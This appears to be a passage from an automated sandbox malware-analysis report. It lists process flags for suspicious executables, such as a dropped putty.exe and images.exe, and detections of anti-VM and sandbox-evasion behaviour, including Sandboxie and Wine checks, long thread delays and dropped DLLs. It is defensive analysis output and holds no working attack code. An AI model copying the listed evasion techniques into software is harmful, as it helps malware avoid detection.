        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Yara detected AntiVM3Show sources
        Source: Yara matchFile source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
        Source: putty.exe, 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
        Source: putty.exe, 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,13_2_0040D8FB
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,15_2_0040D8FB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\ProgramData\images.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 709
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWindow / User API: threadDelayed 8061
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWindow / User API: threadDelayed 1448
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWindow / User API: foregroundWindowGot 420
        Source: C:\ProgramData\images.exeDropped PE file which has not been started: C:\Program Files\Microsoft DN1\sqlmap.dllJump to dropped file
        Source: C:\ProgramData\images.exeDropped PE file which has not been started: C:\Windows\System32\rfxvmt.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2412Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3064Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2684Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2568Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3016Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2704Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exe TID: 2972Thread sleep time: -44533s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exe TID: 1520Thread sleep time: -922337203685477s >= -30000sJump to behavior
